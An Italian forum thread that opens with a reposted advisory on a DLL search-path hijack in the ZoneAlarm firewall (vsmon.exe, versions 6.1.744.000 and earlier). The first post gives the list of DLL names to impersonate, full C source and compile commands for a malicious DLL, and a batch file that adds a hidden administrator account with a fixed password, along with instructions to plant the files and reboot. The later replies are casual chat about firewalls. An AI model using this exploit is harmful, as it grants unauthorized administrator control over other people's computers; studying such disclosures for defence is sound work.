Quanto è bello zone alarm con la backdoor

[[Gnomix]]

Leggete qua


Se sul PC è installato il firewall Zone Alarm, alla partenza di Windows il servizio vsmon.exe (eseguito nell´ambito degli account (G) locali) carica 18 librerie di collegamento dinamico (dll), riportate di seguito.

VSUTIL_Loc0409_Oem8701.dll
VSUTIL_Oem8701.dll
VSUTIL_Loc0409.dll
vsmon_Loc0409_Oem8701.dll
vsmon_Oem8701.dll
vsmon_Loc0409.dll
VSRULEDB_Loc0409_Oem8701.dll
VSRULEDB_Oem8701.dll
VSRULEDB_Loc0409.dll
av_Loc0409_Oem8701.dll
av_Oem8701.dll
av_Loc0409.dll
zlquarantine_Loc0409_Oem8701.dll
zlquarantine_Oem8701.dll
zlquarantine_Loc0409.dll
zlsre_Loc0409_Oem8701.dll
zlsre_Oem8701.dll
zlsre_Loc0409.dll

Il problema consiste nel fatto che vsmon.exe non specifica il percorso dei files. Il sistema, pertanto, esegue una scansione di tutte le directory nel path (in ordine) alla ricerca di tali dll. Ciò rende l´intero sistema vulnerabile.
Se un utente con credenziali limitate, infatti, ha accesso in scrittura a una qualunque delle directory del path che precedono in priorità la directory ove si trovano i files legittimi, vi può aggiungere una dll avente lo stesso nome di una qualunque presente nella lista, ma che esegue un´azione dannosa. Questa eventualità, tra l´altro, non è affatto remota: si pensi solo che Windows 2000 concede in default l´accesso illimitato a qualunque utente alla root directory, che ovviamente è presente nel path e precede quasi tutte le altre directory.

Come esempio di ciò che può succedere riportiamo i codici seguenti. Per verificare il bug (G) si compili il seguente codice (ATTENZIONE: nel codice si sostituisca ai simboli « e » rispettivamente un solo segno di minore e un solo segno di maggiore, e si sostituiscano i 2 caratteri || con un solo backslash)


// Per compilare usare i seguenti comandi
//
// gcc -c -DBUILD_DLL magic.c
// gcc -shared -o magic.dll -W1,--out-implib,libkernel32.a magic.o

#include «windows.h»

VOID RunMagicBatFile( VOID );

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
BOOLEAN bSuccess = TRUE;

switch ( fdwReason )
{
case DLL_PROCESS_ATTACH:
RunMagicBatFile();

break;

case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;

case DLL_PROCESS_DETACH:

break;
}

return bSuccess;
}

VOID RunMagicBatFile()
{
TCHAR szWinDir[ _MAX_PATH ];
TCHAR szCmdLine[ _MAX_PATH ];

STARTUPINFO si;
PROCESS_INFORMATION pi;

GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

wsprintf( szCmdLine, "%s||system32||cmd.exe /c magic.bat", szWinDir );

ZeroMemory( &si, sizeof( si ) );

si.cb = sizeof( si );

ZeroMemory( &pi, sizeof( pi ) );

CreateProcess( NULL, szCmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi );

CloseHandle( pi.hProcess );
CloseHandle( pi.hThread );
}


Una volta compilato copiate il file magic.dll nella directory prescelta cambiandone il nome in un nome qualunque della lista riportata sopra. Nella stessa directory create un file chiamato magic.bat contenente il seguente codice:


net user Magic M@g1c$$ /add
net localgroup Administrators Magic /add


Riavviate il computer e scoprirete che esiste un nuovo account di amministratore chiamato Magic la cui password è M@g1c$$ con accesso illimitato all´intero computer.

Le versioni su cui è presente il bug sono la 6.1.744.000 e precedenti; se proprio vi scocciate di compilare il codice, o non avete le librerie, o quant´altro, potete scaricarvi i files già belli e pronti dal sito personale di Reed Arvin, che ha scoperto questa vulnerabilità.


W i firewall ora mi domando... quanti firewall sono privi di backdoor ?

[gioran888]

Quote:

Originariamente inviato da [Gnomix]

Leggete qua

W i firewall ora mi domando... quanti firewall sono privi di backdoor ?

Oddio, ma allora il mio muletto è a rischio di intrusioni

E che è quella roba che hai scritto.................
Mi sembra che il mio muletto può dormire sonni tranquilli............c'è troppo da lavorare per penetrarlo...........analisi costo/beneficio ???
Scherzo ovviamente

[ezio]

non ero a conoscenza di questa backdoor, suppongo però che ogni firewall abbia il suo punto debole...
Si sa già se le versioni successive correggeranno il problema?

Ciao

Beh, io è una vita che dico: questo firewall è pieno di questo tipo di porcherie ...e non penso sia l'unico, almeno per quanto riguarda i FREE.

A me sembra solo ottimo per rallentare ulteriormente il sistema e nulla più

Infatti free per free, uso quello di XP SP2 ed ho risolto la situazione : niente finestre rompi, niente risorse di sistema occupate inutilmente e velocità di navigazione garantita, con un minimo di sicurezza, almeno per ciò che riguarda gli attacchi dall'esterno (che son poi quelli che interessano maggiormente)

PS naturalmente so su che siti navigo e non scarico porcherrie varie e o di dubbia provenienza

Se passa qualcosa (ma a meno che non lo faccia io di proposito...) ci pensa Kav ed eventualmente Ewido. In ogni caso Con Firefox e la sua estensione adblock (volendo si potrebbe pure installare NOSCRIPT)...non passa quasi nulla

[gioran888]

Quote:

Originariamente inviato da Ferdy78

Beh, io è una vita che dico: questo firewall è pieno di questo tipo di porcherie ...e non penso sia l'unico, almeno per quanto riguarda i FREE.

A me sembra solo ottimo per rallentare ulteriormente il sistema e nulla più

Infatti free per free, uso quello di XP SP2 ed ho risolto la situazione : niente finestre rompi, niente risorse di sistema occupate inutilmente e velocità di navigazione garantita, con un minimo di sicurezza, almeno per ciò che riguarda gli attacchi dall'esterno (che son poi quelli che interessano maggiormente)

PS naturalmente so su che siti navigo e non scarico porcherrie varie e o di dubbia provenienza

Se passa qualcosa (ma a meno che non lo faccia io di proposito...) ci pensa Kav ed eventualmente Ewido. In ogni caso Con Firefox e la sua estensione adblock (volendo si potrebbe pure installare NOSCRIPT)...non passa quasi nulla

Ti dirò.............. rallentamenti proprio no...........non è il massimo, ma comunque meglio di SP2 non fosse altro perchè controlla le connessioni in uscita.
Ciao

[[Gnomix]]

Io sono convinto che mooooooolti software facciano 'giochetti' del genere... quindi a dir la veirtà non è che mi stupisco più di tanto anche se mi può infastidire.

[gioran888]

Quote:

Originariamente inviato da [Gnomix]

Io sono convinto che mooooooolti software facciano 'giochetti' del genere... quindi a dir la veirtà non è che mi stupisco più di tanto anche se mi può infastidire.

Esatto, sono pienamente d'accordo.
Lo fanno anche quelli a pagamento, figuriamoci i free. Non dimentichiamo però che appunto sono free.
Ciao